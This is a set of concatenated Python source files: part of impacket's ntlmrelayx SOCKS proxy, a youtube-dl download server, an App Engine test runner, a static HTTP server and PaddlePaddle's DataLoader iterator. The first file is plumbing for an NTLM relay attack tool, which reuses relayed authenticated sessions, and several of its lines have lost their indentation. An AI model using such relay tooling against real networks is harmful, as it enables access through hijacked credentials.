                    self.__connSocket.close()
                    return
                # Ok, so we have a valid connection to play with. Let's lock it while we use it so the Timer doesn't send a
                # keep alive to this one.
                self.__socksServer.activeRelays[self.targetHost][self.targetPort][relay.username]['inUse'] = True
                relay.tunnelConnection()
            except Exception, e:
                if logging.getLogger().level == logging.DEBUG:
                    import traceback
                    traceback.print_exc()
                LOG.debug('SOCKS: %s' % str(e))
                if str(e).find('Broken pipe') >= 0 or str(e).find('reset by peer') >= 0 or \
                   str(e).find('Invalid argument') >= 0:
                    # Connection died, taking out of the active list
                    del(self.__socksServer.activeRelays[self.targetHost][self.targetPort][relay.username])
                    if len(self.__socksServer.activeRelays[self.targetHost][self.targetPort].keys()) == 1:
                        del(self.__socksServer.activeRelays[self.targetHost][self.targetPort])
                    LOG.debug('Removing active relay for %s@%s:%s' % (relay.username, self.targetHost, self.targetPort))
                    self.sendReplyError(replyField.CONNECTION_REFUSED)
                    return
                pass
            # Freeing up this connection
            if relay.username is not None:
                self.__socksServer.activeRelays[self.targetHost][self.targetPort][relay.username]['inUse'] = False
else:
LOG.error('SOCKS: I don\'t have a handler for this port')
LOG.debug('SOCKS: Shutting down connection')
try:
self.sendReplyError(replyField.CONNECTION_REFUSED)
except Exception, e:
LOG.debug('SOCKS END: %s' % str(e))
class SOCKS(SocketServer.ThreadingMixIn, SocketServer.TCPServer):
    """Threaded SOCKS proxy that tunnels client connections through the
    relayed sessions held in ``activeRelays``.

    One handler thread per client (ThreadingMixIn); protocol handlers for
    specific ports are registered from the socksplugins package.
    """
    def __init__(self, server_address=('0.0.0.0', 1080), handler_class=SocksRequestHandler):
        LOG.info('SOCKS proxy started. Listening at port %d', server_address[1] )
        # {targetHost: {targetPort: {username: relayData}}}
        self.activeRelays = {}
        # {port: plugin class} — filled from SOCKS_RELAYS below
        self.socksPlugins = {}
        self.restAPI = None
        self.activeConnectionsWatcher = None
        self.supportedSchemes = []
        # allow quick restarts without TIME_WAIT bind failures
        SocketServer.TCPServer.allow_reuse_address = True
        SocketServer.TCPServer.__init__(self, server_address, handler_class)
        # Let's register the socksplugins plugins we have
        from impacket.examples.ntlmrelayx.servers.socksplugins import SOCKS_RELAYS
        for relay in SOCKS_RELAYS:
            LOG.info('%s loaded..' % relay.PLUGIN_NAME)
            self.socksPlugins[relay.getProtocolPort()] = relay
            self.supportedSchemes.append(relay.PLUGIN_SCHEME)
        # Let's create a timer to keep the connections up.
        self.__timer = RepeatedTimer(KEEP_ALIVE_TIMER, keepAliveTimer, self)
        # Let's start our RESTful API
        self.restAPI = Thread(target=webService, args=(self, ))
        self.restAPI.daemon = True
        self.restAPI.start()
        # Let's start out worker for active connections
        self.activeConnectionsWatcher = Thread(target=activeConnectionsWatcher, args=(self, ))
        self.activeConnectionsWatcher.daemon = True
        self.activeConnectionsWatcher.start()

    def shutdown(self):
        """Stop the keep-alive timer and the TCP server.

        NOTE(review): the REST API / watcher threads are daemon threads;
        deleting the references does not stop them, only drops the handles.
        """
        self.__timer.stop()
        del self.restAPI
        del self.activeConnectionsWatcher
        return SocketServer.TCPServer.shutdown(self)
if __name__ == '__main__':
    # Standalone mode: start the SOCKS proxy on 0.0.0.0:1080 and serve forever.
    from impacket.examples import logger
    logger.init()
    s = SOCKS()
    s.serve_forever()
|
youtube-dl-server.py | import json
import subprocess
from queue import Queue
import io
import sys
from pathlib import Path
import re
from datetime import date
from bottle import run, Bottle, request, static_file, response, redirect, template, get
from threading import Thread
from bottle_websocket import GeventWebSocketServer
from bottle_websocket import websocket
from socket import error
import logging
logging.basicConfig(format="%(asctime)s [%(levelname)s] %(message)s")
L = logging.getLogger(__name__)
L.setLevel(logging.DEBUG)
class WSAddr:
    """Tiny mutable holder for a websocket address string (starts empty)."""

    def __init__(self):
        self.wsClassVal = ""
import bottle

bottle.debug(True)  # verbose error pages — development aid

app = Bottle()  # NOTE(review): created but unused; routes use bottle's default app via @get
port = 8080
proxy = ""  # unused here; presumably an upstream proxy setting — TODO confirm
WS = []  # currently connected websockets; send() broadcasts to all of these
def send(msg):
    """Broadcast *msg* to every connected websocket.

    Sockets whose send fails are treated as dead and removed from WS.
    """
    # Iterate a snapshot: WS may be mutated while we loop.
    for ws in WS.copy():
        try:
            L.debug("> " + msg)
            ws.send(msg)
        except Exception as e:
            # Previously only socket.error was caught, so e.g. a
            # WebSocketError from a half-closed peer escaped and aborted
            # the whole broadcast; the caught exception was also never
            # logged. Catch broadly and record the reason.
            L.debug(f"> ws {ws} failed ({e!r}). Closing.")
            if ws in WS:
                WS.remove(ws)
def pcall(cmd):
    """Run *cmd*, announcing it over the websockets; raise on non-zero exit."""
    send(f"Running {cmd}")
    proc = subprocess.run(cmd, capture_output=True, text=True, encoding="ASCII")
    if proc.returncode == 0:
        return proc
    msg = f"Error executing {cmd}\ncode:{proc.returncode}\nout:{proc.stdout}\nerr:{proc.stderr}"
    send(msg)
    raise Exception(msg)
@get("/download")
def dl_queue_list():
    """Serve the download-form page."""
    return template("./static/template/download.tpl")
_re_date = re.compile("(\d\d\d\d\-\d\d-\d\d).*")
@get("/")
@get("/gallery")
def gallery():
    """Render the gallery page listing downloaded videos, newest first."""
    video_suffixes = {".mkv", ".webm", ".mp4"}
    found = []
    for p in Path("./videos").glob("**/*"):
        if p.suffix in video_suffixes and not p.name.startswith("."):
            found.append(p)

    def sort_key(p):
        # Files whose name starts with an ISO date sort by their full name;
        # undated files sink to the bottom via an all-zero date key.
        return p.name if _re_date.match(p.name) else "0000-00-00"

    found.sort(key=sort_key, reverse=True)
    videos = [{"name": p.name, "src": "/video/" + "/".join(p.parts[1:])} for p in found]
    return template("./static/template/gallery.tpl", {"videos": videos})
@get("/video/<filepath:path>")
def video(filepath):
    """Serve a downloaded video file from the ./videos tree."""
    return static_file(filepath, root="./videos")
@get("/websocket", apply=[websocket])
def echo(ws):
    # Register the client so send() broadcasts reach it.
    # NOTE(review): the logged total is taken *before* the append.
    L.debug(f"New WebSocket {ws} total={len(WS)}")
    WS.append(ws)
    # need to receive once so socket gets not closed
    L.debug(ws.receive())
    ws.send(f"Downloads queued {dl_q.qsize()}\n")
@get("/youtube-dl/static/<filepath:path>")
def server_static(filepath):
    """Serve static UI assets (JS/CSS/templates) from ./static."""
    return static_file(filepath, root="./static")
@get("/youtube-dl/q", method="GET")
def q_size():
    """Report the queued requests (NOTE: 'size' actually holds the JSON list)."""
    queued = list(dl_q.queue)
    return {"success": True, "size": json.dumps(queued)}
@get("/youtube-dl/q", method="POST")
def q_put():
    """Queue a download request ({url, av}) and ensure the worker is running.

    Returns a JSON dict with a success flag and a human-readable msg.
    """
    url = request.json.get("url")
    av = request.json.get("av")
    if "" != url:
        req = {"url": url, "av": av}
        dl_q.put(req)
        send(f"Queued {url}. Total={dl_q.qsize()}")
        # Restart the worker if it died (e.g. after an unhandled exception).
        # BUG FIX: the old code called Thr().restart(), which stored the new
        # thread on the *instance*, so the class attribute Thr.dl_thread kept
        # pointing at the dead thread and every later request spawned yet
        # another worker. Assign the class attribute directly instead.
        if not Thr.dl_thread.is_alive():
            Thr.dl_thread = Thread(target=dl_worker)
            Thr.dl_thread.start()
        return {"success": True, "msg": f"Queued download {url}"}
    else:
        return {"success": False, "msg": "Failed"}
def dl_worker():
    """Worker loop: pull requests off dl_q and download them until shutdown."""
    L.info("Worker starting")
    while not done:
        download(dl_q.get())
        dl_q.task_done()
def _build_ytdl_cmd(url, av, today):
    """Build the youtube-dl command line for one request.

    Returns (cmd, generate_thumbnail): audio-only requests (av == "A") are
    extracted to mp3 and get no thumbnail.
    """
    if av == "A":  # audio only
        return (
            [
                "youtube-dl",
                "--no-progress",
                "--restrict-filenames",
                "--format",
                "bestaudio",
                "-o",
                f"./downloads/{today} %(title)s via %(uploader)s.audio.%(ext)s",
                "--extract-audio",
                "--audio-format",
                "mp3",
                url,
            ],
            False,
        )
    return (
        [
            "youtube-dl",
            "--no-progress",
            "--restrict-filenames",
            "--format",
            "bestvideo[height<=760]+bestaudio",
            # Often sensible video and audio streams are only available separately,
            # so we need to merge the resulting file. Recoding a video to mp4
            # with A+V can take a lot of time, so we opt for an open container format:
            # Option A: Recode Video
            # "--recode-video", "mp4",
            # "--postprocessor-args", "-strict experimental", # allow use of mp4 encoder
            # Option B: Use container format
            # "--merge-output-format", "webm",
            "-o",
            f"./downloads/{today} %(title)s via %(uploader)s.%(ext)s",
            url,
            # "--verbose",
        ],
        True,
    )


def _run_ytdl(cmd):
    """Run youtube-dl, streaming its output to the websockets; return exit code."""
    proc = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
    for line in proc.stdout:
        send("[youtube-dl] " + line.decode("ASCII").rstrip("\n"))
    code = proc.wait()
    proc.stdout.close()
    return code


def _make_thumbnail(cmd):
    """Extract a PNG frame (t=20s) next to the file downloaded by *cmd*."""
    p = pcall(cmd + ["--get-filename"])
    fn = p.stdout.rstrip("\n")
    # The filename is not actually accurate. The extension might be wrongly detected.
    # Let's glob this:
    fn = str(list(Path(".").glob(str(Path(fn).with_suffix("")) + "*"))[0])
    pcall(
        [
            "ffmpeg",
            "-y",
            "-i",
            fn,
            "-ss",
            "00:00:20.000",
            "-vframes",
            "1",
            fn + ".png",
        ]
    )


def download(req):
    """Download one queued request ({url, av}), reporting progress via send()."""
    today = date.today().isoformat()
    url = req["url"]
    av = req["av"]
    send(f"Starting download of {url}")
    cmd, generate_thumbnail = _build_ytdl_cmd(url, av, today)
    send("[youtube-dl] " + " ".join(cmd))
    code = _run_ytdl(cmd)
    try:
        if code == 0:
            send("[Finished] " + url + ". Remaining: " + json.dumps(dl_q.qsize()))
        else:
            send("[Failed] " + url)
            return
    except error as e:
        # socket.error while notifying clients — log and give up on this item.
        L.error(e)
        send("[Failed]" + str(e))
        return
    if generate_thumbnail:
        _make_thumbnail(cmd)
    send("Done.")
class Thr:
    """Holder for the single download-worker thread.

    The worker handle lives on the *class* (Thr.dl_thread) so liveness
    checks elsewhere see the thread that was actually (re)started.
    """

    # Class-level handle; replaced by restart() and by module start-up code.
    dl_thread = ""

    def __init__(self):
        self.dl_thread = ""

    def restart(self):
        """Start a fresh worker thread and publish it on the class.

        BUG FIX: the old code assigned the new thread to ``self.dl_thread``
        (an instance attribute), leaving the stale class attribute in place,
        so every later liveness check still saw the dead thread.
        """
        Thr.dl_thread = Thread(target=dl_worker)
        Thr.dl_thread.start()
# --- module start-up --------------------------------------------------
# Shared work queue and shutdown flag read by dl_worker().
dl_q = Queue()
done = False
# Start the single background download worker; stored on the class so the
# POST handler can check liveness and restart it.
Thr.dl_thread = Thread(target=dl_worker)
Thr.dl_thread.start()
# Blocks until the server exits (reloader=True runs the app in a child).
run(host="0.0.0.0", port=port, server=GeventWebSocketServer, reloader=True)
done = True
Thr.dl_thread.join()
|
run_tests.py | #!/usr/bin/python
import multiprocessing
import optparse
import StringIO
import sys
import time
import warnings
# Install the Python unittest2 package before you run this script.
import unittest2
# optparse usage/help text for this script.
USAGE = """%prog -s SDK_PATH -t TEST_PATTERN
Run unit tests for App Engine apps.
The SDK Path is probably /usr/local/google_appengine on Mac OS
SDK_PATH Path to the SDK installation"""
def start_suite(suite, queue):
    """Run one test suite and put (output, tests_run, ok) on *queue*.

    Executed in a child process; results travel back through the
    multiprocessing queue rather than via a return value.
    """
    sio = StringIO.StringIO()
    testresult = unittest2.TextTestRunner(sio, verbosity=2).run(suite)
    queue.put((sio.getvalue(), testresult.testsRun, testresult.wasSuccessful()))
def main(sdk_path, test_pattern):
    """Discover tests under ./tests and run each suite in its own process.

    Prints per-suite output plus a summary, then exits with status 1 if
    any suite failed, 0 otherwise (via sys.exit).
    """
    start_time = time.time()
    # The App Engine SDK must be importable before dev_appserver can
    # fix up sys.path for the sandboxed libraries.
    sys.path.insert(0, sdk_path)
    import dev_appserver
    dev_appserver.fix_sys_path()
    suites = unittest2.loader.TestLoader().discover("tests", test_pattern)
    processes = []
    result_queue = multiprocessing.Queue()
    # One child process per top-level suite, all reporting into one queue.
    for suite in suites:
        process = multiprocessing.Process(target=start_suite, args=[suite, result_queue])
        process.start()
        processes.append(process)
    for process in processes:
        process.join()
    fail = False
    total_tests_run = 0
    # All children joined above, so draining until empty() is acceptable
    # here (NOTE(review): Queue.empty() is documented as unreliable in
    # general with multiprocessing — confirm no results can be in flight).
    while not result_queue.empty():
        test_output, tests_run, was_successful = result_queue.get()
        total_tests_run += tests_run
        print '-----------------------'
        print test_output
        if not was_successful:
            fail = True
    print "================================"
    print "Completed {} tests in: {} seconds".format(total_tests_run, time.time() - start_time)
    if fail:
        print "TESTS FAILED!"
    else:
        print "TESTS PASSED!"
    print "================================"
    if fail:
        sys.exit(1)
    else:
        sys.exit(0)
if __name__ == '__main__':
    # Command-line entry point: -s SDK path, -t test filename pattern.
    parser = optparse.OptionParser(USAGE)
    parser.add_option("-s", "--sdk_path", type="string", default="/usr/local/google_appengine",
                      help="path to load Google Appengine SDK from")
    parser.add_option("-t", "--test_pattern", type="string", default="test*.py",
                      help="pattern for tests to run")
    options, args = parser.parse_args()
    main(options.sdk_path, options.test_pattern)
|
http_server.py | import os
import posixpath
import urllib
import threading
from pkg_resources import resource_filename
from BaseHTTPServer import HTTPServer
from SimpleHTTPServer import SimpleHTTPRequestHandler
# Directory shipped inside the globeplot package holding the WebGL assets.
BASE = resource_filename('globeplot', '')
# ROOT = os.path.join(os.path.split(BASE)[0], 'webgl_globe')
ROOT = os.path.join(BASE, 'webgl_globe')
# modify this to add additional routes
ROUTES = (
    # [url_prefix , directory_path],
    ['', ROOT], # empty string for the 'default' match
)
class RequestHandler(SimpleHTTPRequestHandler):
    """
    Static-file handler that maps URL prefixes to directories via ROUTES.

    Adapted from:
    https://www.huyng.com/posts/modifying-python-simplehttpserver
    """
    def translate_path(self, path):
        """translate path given routes"""
        # set default root to cwd
        root = os.getcwd()
        # look up routes and set root directory accordingly
        for pattern, rootdir in ROUTES:
            if path.startswith(pattern):
                # found match!
                path = path[len(pattern):] # consume path up to pattern len
                root = rootdir
                break
        # normalize path and prepend root directory
        # (strip query string and fragment before touching the filesystem)
        path = path.split('?', 1)[0]
        path = path.split('#', 1)[0]
        path = posixpath.normpath(urllib.unquote(path))
        words = path.split('/')
        words = filter(None, words)
        path = root
        # rebuild component by component, discarding drive letters,
        # directory prefixes and '.'/'..' so requests stay inside root
        for word in words:
            drive, word = os.path.splitdrive(word)
            head, word = os.path.split(word)
            if word in (os.curdir, os.pardir):
                continue
            path = os.path.join(path, word)
        return path
class GlobePlotServer(object):
    """Context-managed, short-lived HTTP server for globeplot pages.

    Adapted from http://stackoverflow.com/a/19578604

    A single HTTPServer instance is shared at class level; the first
    GlobePlotServer owns it and runs serve_forever on a daemon thread.
    """
    server = None
    keep_alive = 4  # the webserver is only up for 4 seconds

    def __init__(self):
        # BUG FIX: always define self.thread. Previously a second instance
        # (created while the class-level server already existed) never set
        # it, so up() raised AttributeError instead of printing the
        # "already running" notice.
        self.thread = None
        if not GlobePlotServer.server:
            GlobePlotServer.server = HTTPServer(('localhost', 8000), RequestHandler)
            self.thread = threading.Thread(target=GlobePlotServer.server.serve_forever)
            self.thread.daemon = True

    def __enter__(self):
        if GlobePlotServer.server:
            self.up()
        return self

    def __exit__(self, exc_type, exc_value, traceback):
        # http://stackoverflow.com/questions/865115/how-do-i-correctly-clean-up-a-python-object
        self.down()

    def up(self):
        """Start serving (only the instance that created the server does)."""
        if GlobePlotServer.server and self.thread:
            self.thread.start()
            print('Starting server on port {}'.format(GlobePlotServer.server.server_port))
        else:
            # BUG FIX: report the real port instead of the old hard-coded 0.
            port = GlobePlotServer.server.server_port if GlobePlotServer.server else 0
            print('Server already running on port {}'.format(port))
            GlobePlotServer.keep_alive = 4

    def down(self):
        """Shut the server down after keep_alive seconds of grace time."""
        if GlobePlotServer.server:
            # This is currently necessary to give the webserver time enough
            # to serve the page...
            # TODO: Figure out how to improve this
            print('Will stop server in {} seconds'.format(GlobePlotServer.keep_alive))
            import time
            time.sleep(GlobePlotServer.keep_alive)
            GlobePlotServer.server.shutdown()
            print('Stopping server on port {}'.format(GlobePlotServer.server.server_port))
            GlobePlotServer.server = None
|
dataloader_iter.py | # Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import six
import sys
import time
import signal
import numbers
import logging
import itertools
import threading
import numpy as np
import multiprocessing
from collections import namedtuple
# NOTE: queue has a different name in python2 and python3
if six.PY2:
import Queue as queue
else:
import queue
import paddle
from .. import core, layers
from ..framework import in_dygraph_mode
from ..multiprocess_utils import CleanupFuncRegistrar, _cleanup_mmap, _set_SIGCHLD_handler
from .fetcher import _IterableDatasetFetcher, _MapDatasetFetcher
__all__ = ['get_worker_info']
# multi-process worker check indices queue interval, avoid
# hanging in subprocess data loading
MP_INDICES_CHECK_INTERVAL = 5

# Sentinel a worker puts on the result queue when its IterableDataset
# raises StopIteration, so the reader thread knows that worker drained.
_IterableDatasetStopIteration = namedtuple('_IterableDatasetStopIteration',
                                           ['worker_id'])
def default_collate_fn(batch):
    """
    Default batch collating function for :code:`fluid.io.DataLoader`,
    batch should be a list of samples, and each sample should be a list
    of fields as follows:
    [[filed1, filed2, ...], [filed1, filed2, ...], ...]
    This default collate function zipped each filed together and stack
    each filed as the batch field as follows:
    [batch_filed1, batch_filed2, ...]
    Args:
        batch(list of list of numpy array): the batch data, each fields
              should be a numpy array, each sample should be a list of
              fileds, and batch should be a list of sample.
    Returns:
        a list of numpy array: collated batch
    """
    sample = batch[0]
    # dataset has only 1 field
    if isinstance(sample, np.ndarray):
        return [np.stack(batch, axis=0)]

    # batch each field: slots[i] collects field i of every sample
    slots = []
    for items in batch:
        for i, item in enumerate(items):
            if len(slots) < len(items):
                slots.append([item])
            else:
                slots[i].append(item)

    outputs = []
    for slot in slots:
        # BUG FIX: np.bool_ replaces the np.bool alias, which was deprecated
        # in NumPy 1.20 and removed in 1.24 (AttributeError on access).
        if isinstance(slot[0], (np.ndarray, np.bool_, numbers.Number)):
            tmp = np.stack(slot, axis=0)
            outputs.append(tmp)
        elif isinstance(slot[0], paddle.Tensor):
            tmp = layers.stack(slot, axis=0)
            outputs.append(tmp)
        else:
            raise RuntimeError("Unknown data type {}".format(type(slot[0])))
    return outputs
class _DatasetKind(object):
MAP = 0
ITER = 1
@staticmethod
def create_fetcher(kind, dataset, collate_fn, drop_last):
if kind == _DatasetKind.MAP:
return _MapDatasetFetcher(dataset, collate_fn, drop_last)
elif kind == _DatasetKind.ITER:
return _IterableDatasetFetcher(dataset, collate_fn, drop_last)
else:
raise NotImplementedError("unknown Dataset kind {}".format(kind))
class ParentWatchDog(object):
    """Reports whether the parent process is still alive.

    Once the parent is observed dead (ppid changed, i.e. this process was
    re-parented), the dead state is latched and never reset.
    """

    def __init__(self):
        # Remember who our parent was at construction time.
        self._watched_pid = os.getppid()
        self._alive = True

    def is_alive(self):
        # A re-parented process gets a new ppid, which means the original
        # parent has exited.
        if self._alive and os.getppid() != self._watched_pid:
            self._alive = False
        return self._alive
# Per-process record of the current DataLoader worker; stays None in the
# main process and is populated by _worker_loop inside worker subprocesses.
_worker_info = None


def get_worker_info():
    """Return the current DataLoader worker's ``WorkerInfo``, or None.

    Inside a worker subprocess this exposes :attr:`id` (0-based worker
    index), :attr:`num_workers` and :attr:`dataset`, which lets an
    ``IterableDataset.__iter__`` implementation split its data range so
    each worker yields a disjoint shard (see
    :code:`paddle.io.IterableDataset` for a worked example). In the main
    process there is no worker, so None is returned.
    """
    return _worker_info
class WorkerInfo(object):
    """Immutable record describing one DataLoader worker.

    All keyword arguments become attributes during construction; after
    that, every attribute assignment raises RuntimeError.
    """

    __initialized = False

    def __init__(self, **kwargs):
        for name in kwargs:
            setattr(self, name, kwargs[name])
        self.__initialized = True

    def __setattr__(self, key, val):
        # The flag flips to True as the last step of __init__, freezing
        # the instance from then on.
        if self.__initialized:
            raise RuntimeError("Cannot assign attributes to {} objects".format(
                self.__class__.__name__))
        return super(WorkerInfo, self).__setattr__(key, val)
class _DataLoaderIterBase(object):
"""
Iterator implement of DataLoader, will load and feed mini-batch
data by setting in given dataloader.
Args:
loader(instance of DataLoader): instance of `fluid.io.DataLoader`
"""
def __init__(self, loader):
self._dataset = loader.dataset
self._feed_list = loader.feed_list or []
self._places = loader.places
self._return_list = loader.return_list
self._batch_sampler = loader.batch_sampler
self._sampler_iter = iter(loader.batch_sampler)
self._collate_fn = loader.collate_fn or default_collate_fn
self._num_workers = loader.num_workers
self._use_buffer_reader = loader.use_buffer_reader
self._use_shared_memory = loader.use_shared_memory
self._timeout = loader.timeout if loader.timeout > 0 else MP_INDICES_CHECK_INTERVAL
self._worker_init_fn = loader.worker_init_fn
self._dataset_kind = loader.dataset_kind
self._pin_memory = loader.pin_memory
# LoDTensorBlockingQueue instance for create_py_reader and a thread
# to put mini-batch data to self._blocking_queue, mini-batch data
# will be get from:
# 1. multi-process mode: get data from workers' result queue
# 2. single-process mode: read mini-batch data in main process
self._blocking_queue = None
self._thread = None
self._thread_done_event = threading.Event()
def __iter__(self):
return self
def __len__(self):
return len(self._batch_sampler)
class _DataLoaderIterSingleProcess(_DataLoaderIterBase):
    """
    Single process implement of DataLoaderIter, loading data from
    loader.data in main process
    """

    def __init__(self, loader):
        super(_DataLoaderIterSingleProcess, self).__init__(loader)

        # fetcher reads mini-batches directly from the dataset in this process
        self._dataset_fetcher = _DatasetKind.create_fetcher(
            self._dataset_kind, self._dataset, self._collate_fn, True)

        # NOTE: len(self._places) batch data compose as an output
        # iteration, set blocking_queue can cache 2 iteration datas
        # at most here
        self._blocking_queue_capacity = 2 * len(self._places)

        self._init_thread()

    def _init_thread(self):
        # metadata create_py_reader needs to validate fed data against
        self._var_names = [v.name for v in self._feed_list]
        self._shapes = [v.shape for v in self._feed_list]
        self._dtypes = [v.dtype for v in self._feed_list]
        self._need_check_feed = [
            v.desc.need_check_feed() for v in self._feed_list
        ]
        # if only 1 place, do not need to keep order
        self._blocking_queue = core.init_lod_tensor_blocking_queue(
            core.Variable(), self._blocking_queue_capacity,
            len(self._places) > 1)
        self._reader = core.create_py_reader(
            self._blocking_queue, self._var_names, self._shapes, self._dtypes,
            self._need_check_feed, self._places, self._use_buffer_reader, True,
            self._pin_memory)

        # daemon thread so an abandoned iterator cannot block interpreter exit
        self._thread = threading.Thread(target=self._thread_loop)
        self._thread.daemon = True
        self._thread.start()

    def _thread_loop(self):
        """Producer loop: fetch batches and push them into the blocking
        queue until the sampler is exhausted or the consumer stops."""
        try:
            for indices in self._sampler_iter:
                # read data from dataset in mini-batch
                batch = self._dataset_fetcher.fetch(indices)

                # pack as LoDTensorArray
                array = core.LoDTensorArray()
                for slot in batch:
                    if not isinstance(slot, core.LoDTensor):
                        self._check_input_array(slot)
                        # FIXME(dkp): blocking_queue only support
                        # core.LoDTensorArray as input now, read
                        # numpy data into a LoDTensorArray here,
                        # should support paddle.Tensor list later
                        if isinstance(slot, paddle.Tensor):
                            slot = slot.numpy()
                        tmp = core.LoDTensor()
                        tmp.set(slot, core.CPUPlace())
                        slot = tmp
                    array.append(slot)

                # push returns False when the consumer side closed the queue
                if not self._blocking_queue.push(array):
                    break

            self._blocking_queue.close()
            self._thread = None
        except StopIteration:
            self._blocking_queue.close()
        except Exception:
            self._blocking_queue.kill()
            self._thread = None
            logging.warning("DataLoader reader thread raised an exception.")
            six.reraise(*sys.exc_info())

    @classmethod
    def _check_input_array(cls, item):
        """Reject ragged inputs that NumPy can only store as object arrays."""
        if isinstance(item, paddle.Tensor):
            return
        arr = np.array(item)
        # BUG FIX: np.object_ replaces the np.object alias, which was
        # deprecated in NumPy 1.20 and removed in 1.24 (AttributeError on
        # access made every array check fail on modern NumPy).
        if arr.dtype == np.object_:
            raise TypeError((
                "\n\tFaild to convert input data to a regular ndarray :\n\t* Usually "
                "this means the input data contains nested lists with different lengths. "
                "\n\t* Check the reader function passed to 'decorate_batch_generator'"
                " to locate the data causes this issue.\n\t* Please consider using "
                "'fluid.create_lod_tensor' to convert it to a LoD-Tensor."))

    def __next__(self):
        """Return the next batch; raises StopIteration when exhausted."""
        try:
            if in_dygraph_mode():
                return self._reader.read_next_var_list()
            else:
                if self._return_list:
                    # static graph organized data on multi-device with list, if
                    # place number is 1, there is only 1 device, extra the data
                    # from list for devices to be compatible with dygraph mode
                    if len(self._places) == 1:
                        return self._reader.read_next_list()[0]
                    else:
                        return self._reader.read_next_list()
                else:
                    return self._reader.read_next()
        except StopIteration:
            self._reader.reset()
            six.reraise(*sys.exc_info())

    # python2 compatibility
    def next(self):
        return self.__next__()

    def __del__(self):
        # _blocking_queue in keep order mode holds sub-threads
        # need to release thread resources on unexpected exit
        if self._blocking_queue:
            self._blocking_queue.close()
# NOTE(chenweihang): _worker_loop must be top level method to be pickled
def _worker_loop(dataset, dataset_kind, indices_queue, out_queue, done_event,
                 collate_fn, init_fn, worker_id, num_workers,
                 use_shared_memory):
    """Subprocess body: fetch batches for indices read from *indices_queue*
    and put results (or exceptions) on *out_queue* until *done_event* is
    set or the parent process dies.
    """
    try:
        # NOTE: [ mmap files clear ] When the child process exits unexpectedly,
        # some shared memory objects may have been applied for but have not yet
        # been put into the inter-process Queue. This part of the object needs
        # to be cleaned up when the process ends.
        CleanupFuncRegistrar.register(_cleanup_mmap)

        # set signal handler
        core._set_process_signal_handler()

        # publish this worker's identity for get_worker_info()
        global _worker_info
        _worker_info = WorkerInfo(
            id=worker_id, num_workers=num_workers, dataset=dataset)

        init_exception = None
        try:
            if init_fn is not None:
                init_fn(worker_id)
            fetcher = _DatasetKind.create_fetcher(dataset_kind, dataset,
                                                  collate_fn, True)
        except:
            # deferred: the failure is sent to the parent on the first
            # fetch request instead of crashing the worker right away
            init_exception = Exception("init_fn failed in worker {}: " \
                "{}".format(worker_id, sys.exc_info()))

        iterator_drained = False
        parent_watch_dog = ParentWatchDog()

        while parent_watch_dog.is_alive():
            try:
                data = indices_queue.get(MP_INDICES_CHECK_INTERVAL)
            except queue.Empty:
                continue

            # None as poison piil, so worker event should be set
            if data is None:
                assert done_event.is_set() or iterator_drained, \
                    "get None when worker done_event set"
                break
            # If worker done event is set but get still get data in
            # indices_queue, remaining data should be get and skipped.
            if done_event.is_set() or iterator_drained:
                continue

            idx, indices = data
            try:
                if init_exception is not None:
                    batch = init_exception
                    init_exception = None
                else:
                    batch = fetcher.fetch(indices)
            except Exception as e:
                if isinstance(
                        e, StopIteration) and dataset_kind == _DatasetKind.ITER:
                    out_queue.put(_IterableDatasetStopIteration(worker_id))
                    iterator_drained = True
                else:
                    # exceptions travel to the parent as data for re-raise
                    out_queue.put((idx, e))
            else:
                if use_shared_memory:
                    # FIXME(dkp): _convert_to_tensor_list only support np.array
                    # list now, should support paddle.Tensor list
                    if isinstance(batch[0][0], paddle.Tensor):
                        np_batch = []
                        for sample in batch:
                            np_batch.append([s.numpy() for s in sample])
                        batch = np_batch

                    tensor_list = core._convert_to_tensor_list(batch)
                    out_queue.put((idx, tensor_list))
                    core._remove_tensor_list_mmap_fds(tensor_list)
                else:
                    out_queue.put((idx, batch))
    except KeyboardInterrupt:
        # NOTE: Main process will raise KeyboardInterrupt anyways, ignore it in child process
        pass
    except:
        six.reraise(*sys.exc_info())
    finally:
        if use_shared_memory:
            _cleanup_mmap()
class _DataLoaderIterMultiProcess(_DataLoaderIterBase):
    def __init__(self, loader):
        """Spin up worker subprocesses, pre-fill their indices queues, and
        start the reader thread that reorders results."""
        super(_DataLoaderIterMultiProcess, self).__init__(loader)

        assert self._num_workers > 0,  "Multi-process DataLoader " \
            "invalid num_workers({})".format(self._num_workers)

        # subprocess wrokers' result queue
        self._data_queue = None

        # data get from _data_queue will be reordered by _rcvd_idx
        # for data order keeping, data index not equal _rcvd_idx
        # will be cached in _task_infos
        self._send_idx = 0
        self._rcvd_idx = 0
        self._batches_outstanding = 0
        self._task_infos = {}

        # indices outstand as _outstanding_capacity at first, and
        # blocking_queue capacity is also _outstanding_capacity.
        # _outstanding_capacity here to make sure each indices_queue
        # has at least 2 indices, and outstanding batch cached
        # output data for at least 2 iterations(Note that len(_places)
        # batches will be composed as an iteration output)
        self._outstanding_capacity = 2 * max(self._num_workers,
                                             len(self._places))

        # see _try_put_indices
        self._thread_lock = threading.Lock()

        # init workers and indices queues and put 2 indices in each indices queue
        self._init_workers()
        for _ in range(self._outstanding_capacity):
            self._try_put_indices()

        self._init_thread()
        self._shutdown = False
    def _init_workers(self):
        """Start num_workers subprocesses, each with its own indices queue,
        all feeding one shared result queue."""
        # multiprocess worker and indice queue list initial as empty
        self._workers = []
        self._worker_status = []
        self._indices_queues = []
        # round-robin cursor used when distributing batch indices
        self._workers_idx_cycle = itertools.cycle(range(self._num_workers))

        # create data_queue for workers
        self._data_queue = multiprocessing.Queue()

        # event for workers and thread, thread event is only need
        # in multi-processing mode
        self._workers_done_event = multiprocessing.Event()
        self._thread_done_event = threading.Event()

        for i in range(self._num_workers):
            indices_queue = multiprocessing.Queue()
            self._indices_queues.append(indices_queue)
            worker = multiprocessing.Process(
                target=_worker_loop,
                args=(self._dataset, self._dataset_kind, indices_queue,
                      self._data_queue, self._workers_done_event,
                      self._collate_fn, self._worker_init_fn, i,
                      self._num_workers, self._use_shared_memory))
            # daemon: stray workers die with the main process
            worker.daemon = True
            worker.start()
            self._workers.append(worker)
            self._worker_status.append(True)

